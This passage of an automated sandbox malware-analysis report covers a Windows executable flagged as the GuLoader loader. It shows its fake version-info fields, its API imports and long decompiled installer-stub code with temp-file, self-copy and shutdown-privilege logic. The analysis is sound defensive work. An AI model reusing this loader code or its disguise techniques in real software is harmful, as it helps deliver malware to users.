KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description	Data
LegalCopyright	MakeMusic Inc.
FileVersion	17.9.5
CompanyName	Fortune Brands Inc.
LegalTrademarks	BMC Software, Inc.
Comments	Banknorth Group, Inc.
ProductName	Newmont Mining Corporation
FileDescription	Hubbell Inc.
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: 3GJ6S3Kwnb.exePID: 3256, Parent PID: 1100

General

Target ID:	0
Start time:	21:03:46
Start date:	10/05/2022
Path:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3GJ6S3Kwnb.exe"
Imagebase:	0x400000
File size:	425380 bytes
MD5 hash:	6C6A52C18F0CA26D357F2B4430F31568
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.773047400.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 3GJ6S3Kwnb.exePID: 3256, Parent PID: 1100COMMON

Execution Graph

Execution Coverage:	19.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.6%
Total number of Nodes:	1603
Total number of Limit Nodes:	44

Executed Functions

Function 004034F7 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a2d8 = _v324.dwBuildNumber;
				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a2de != 0x600) {
					_t180 = E004068D4(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406864(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068D4(0xb);
				 *0x42a224 = E004068D4(9);
				_t88 = E004068D4(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a2dc =  *0x42a2dc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a2e0 = _t88;
				SHGetFileInfoW(0x4216c8, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406507(0x429220, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" ";
				E00406507(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a220 = 0x400000;
				_t251 = L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405E03(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E03(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406507(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034C6(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403ADC();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2b4 == _t189) {
														L77:
														_t120 =  *0x42a2cc;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068D4(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B67(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a23c == _t189) {
												L51:
												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
												_v24 = E00403BB6(_t265);
												goto L68;
											}
											_t219 = E00405E03(L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" ") {
													_t190 = E00405AD2(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x436800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AB5();
														} else {
															E00405A38();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406507(L"C:\\Users\\jones\\AppData\\Local\\Temp", 0x436800);
														}
														E00406507(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
															DeleteFileW(0x420ec8);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe", 0x420ec8, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062C7(_t202, 0x420ec8, 0);
																	E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
																	_t153 = E00405AEA(0x420ec8);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062C7(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EDE(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406507(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t222);
												E00406507(0x436000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\jones\\Desktop\\3GJ6S3Kwnb.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034C6(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034C6(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a2c0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x00403505
0x00403506
0x0040350d
0x00403510
0x00403517
0x0040351a
0x0040352d
0x00403533
0x00403536
0x00403539
0x00403547
0x0040354f
0x0040355a
0x00403573
0x00403575
0x0040357d
0x0040357d
0x00403588
0x0040358a
0x0040358a
0x0040359f
0x004035c4
0x004035d2
0x004035d5
0x004035dc
0x004035e3
0x004035e3
0x004035dc
0x004035e5
0x004035ea
0x004035eb
0x004035f7
0x004035fb
0x00403602
0x00403610
0x00403615
0x0040361c
0x00403620
0x00403624
0x00403626
0x00403626
0x00403624
0x0040362d
0x00403634
0x0040363a
0x00403652
0x00403662
0x00403667
0x0040366d
0x00403674
0x0040367b
0x0040367d
0x0040367e
0x00403688
0x0040368f
0x00403691
0x00403693
0x00403693
0x004036a6
0x004036a8
0x004037a2
0x004037a2
0x004037a5
0x004037a8
0x00000000
0x00000000
0x004036b2
0x004036b3
0x004036b6
0x004036bf
0x004036bf
0x004036c2
0x004036c5
0x004036c8
0x004036cb
0x004036cb
0x004036cb
0x004036cc
0x004036d0
0x00403790
0x00403799
0x0040379b
0x0040379e
0x004037a1
0x004037a1
0x004037a1
0x00000000
0x004036d6
0x004036d7
0x004036d8
0x004036dc
0x004036f6
0x004036fd
0x00403710
0x00403711
0x00403726
0x0040372b
0x0040372d
0x0040372f
0x0040374b
0x00403752
0x00403765
0x00403766
0x0040377b
0x00403781
0x00403783
0x00403785
0x0040378d
0x0040378f
0x00000000
0x0040378f
0x00403789
0x0040378b
0x004037b0
0x004037b4
0x004037bd
0x004037c2
0x004037c8
0x004037d3
0x004037d5
0x004037da
0x004037dc
0x00403834
0x00403839
0x00403842
0x00403849
0x0040384c
0x00403a23
0x00403a23
0x00403a28
0x00403a31
0x00403a4e
0x00403ac6
0x00403ac6
0x00403ace
0x00403ad0
0x00403ad0
0x00403ad6
0x00403ad6
0x00403a65
0x00403a71
0x00403a82
0x00403a89
0x00403a90
0x00403a90
0x00403a98
0x00403aa4
0x00403ab2
0x00403abd
0x00000000
0x00000000
0x00000000
0x00403aa6
0x00403aa6
0x00403aa7
0x00403aa9
0x00403aaa
0x00403aab
0x00403ab0
0x00403abf
0x00403ac1
0x00000000
0x00403ac1
0x00000000
0x00403ab0
0x00403aa4
0x00403a3b
0x00403a42
0x00403a42
0x00403858
0x004038ff
0x004038ff
0x0040390b
0x00000000
0x0040390b
0x00403869
0x00403871
0x004038c3
0x004038c3
0x004038c9
0x004038d0
0x0040391e
0x00403920
0x00403925
0x00403927
0x0040392f
0x0040392f
0x0040393a
0x00403946
0x0040394c
0x0040394e
0x00403a21
0x00403a21
0x00403a21
0x00000000
0x00403954
0x00403954
0x00403956
0x00403957
0x00403960
0x00403959
0x00403959
0x00403959
0x00403966
0x0040396e
0x00403975
0x0040397d
0x0040397d
0x0040398a
0x00403996
0x004039a0
0x004039a0
0x004039a2
0x004039a9
0x004039b3
0x004039bf
0x004039c5
0x004039cb
0x004039ce
0x004039d8
0x004039de
0x004039e0
0x004039e4
0x004039f5
0x004039fb
0x00403a00
0x00403a02
0x00403a05
0x00403a0b
0x00403a0b
0x00403a02
0x004039e0
0x00403a0e
0x00403a15
0x00403a15
0x00403a15
0x00403a15
0x00403a1c
0x00000000
0x00403a1c
0x0040394e
0x004038d2
0x004038d5
0x004038d9
0x004038de
0x004038e0
0x00000000
0x00000000
0x004038ec
0x004038f7
0x004038fc
0x00000000
0x004038fc
0x0040387a
0x00403892
0x004038a3
0x004038a4
0x004038a8
0x004038aa
0x004038b8
0x004038bf
0x00000000
0x00000000
0x00000000
0x004038bf
0x004038c1
0x00000000
0x004038c1
0x004037e4
0x004037f0
0x004037f5
0x004037fa
0x004037fc
0x00000000
0x00000000
0x00403804
0x0040380c
0x0040381d
0x00403825
0x00403827
0x0040382c
0x0040382e
0x00000000
0x00000000
0x00000000
0x0040382e
0x00000000
0x0040378b
0x00403734
0x00403736
0x00000000
0x00000000
0x00403738
0x0040373c
0x00403740
0x00403747
0x00403747
0x00403747
0x00403747
0x00000000
0x00403747
0x00403742
0x00403745
0x00000000
0x00000000
0x00000000
0x00403745
0x004036de
0x004036e2
0x004036e5
0x004036ec
0x004036ec
0x00000000
0x004036ec
0x004036e7
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036b8
0x004036b8
0x004036b9
0x004036ba
0x004036ba
0x00000000
0x004036b8
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,"C:\Users\user\Desktop\3GJ6S3Kwnb.exe" ,00000020,"C:\Users\user\Desktop\3GJ6S3Kwnb.exe" ,00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
DeleteFileW.KERNELBASE(1033), ref: 00403839
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3GJ6S3Kwnb.exe" ,00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(C:\Users\user\Desktop\3GJ6S3Kwnb.exe,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32 ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

Low, xrefs: 00403806
"C:\Users\user\Desktop\3GJ6S3Kwnb.exe" , xrefs: 0040366D, 00403673, 00403688, 0040385F, 0040386B, 004038B9, 004038C3
C:\Users\user\AppData\Local\Temp, xrefs: 004037B8, 004038E7, 0040396E, 00403978
UXTHEME, xrefs: 004035E5, 004035EA, 004035F0
C:\Users\user\Desktop\3GJ6S3Kwnb.exe, xrefs: 004039D3
C:\Users\user\AppData\Local\Temp\, xrefs: 004037C8, 004037CD, 004037E3, 004037EF, 004037FE, 0040380B, 00403817, 0040381F, 0040391D, 0040392E, 00403939, 00403945, 00403956, 00403965, 00403A1B
~nsu, xrefs: 00403918
1033, xrefs: 00403834
Error launching installer, xrefs: 004038C9
.tmp, xrefs: 00403934
TEMP, xrefs: 00403818
\Temp, xrefs: 004037EA
SeShutdownPrivilege, xrefs: 00403A6B
TMP, xrefs: 00403820
NSIS Error, xrefs: 00403658

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\3GJ6S3Kwnb.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\3GJ6S3Kwnb.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3922364510
Opcode ID: 67f0230e33585efcca327cd80b3c1b24a3f111523695cb400044338af504c5bf
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: 67f0230e33585efcca327cd80b3c1b24a3f111523695cb400044338af504c5bf
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429204;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423708;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291ec == _t156) {
							ShowWindow( *0x42a228, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226e0; // 0x80bc74
								E00405569( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040443C(_t171);
							goto L25;
						}
						 *0x421ed8 = 2;
						E0040443C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044CA(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291f0, _t156);
						ShowWindow(_t169, 8);
						E00404498(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a230;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291f0 = GetDlgItem(_a4, 0x403);
				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429204 = _t134;
				_v8 = _t134;
				E00404498( *0x4291f0);
				 *0x4291f4 = E00404DF1(4);
				 *0x42920c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404463(_a4);
				if(( *0x42a238 & 0x00000003) != 0) {
					ShowWindow( *0x4291f0, _t156);
					if(( *0x42a238 & 0x00000002) != 0) {
						 *0x4291f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404498( *0x4291e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
